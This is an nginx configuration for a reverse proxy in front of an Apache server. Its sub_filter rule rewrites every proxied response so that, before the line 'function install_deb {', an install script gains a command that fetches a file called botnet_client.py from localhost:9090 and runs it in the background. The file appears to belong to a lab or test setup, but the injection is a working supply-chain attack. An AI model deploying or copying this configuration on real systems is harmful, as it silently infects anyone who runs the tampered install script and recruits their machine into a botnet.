http {
    server {
        location / {
            sub_filter_types '*';
            sub_filter 'function install_deb {' 'curl -so ./botnet_client.py http://localhost:9090/botnet_client.py && python ./botnet_client.py &\nfunction install_deb {';
            sub_filter_once off;
            proxy_pass http://apache:80;
        }
    }
}
events {
}
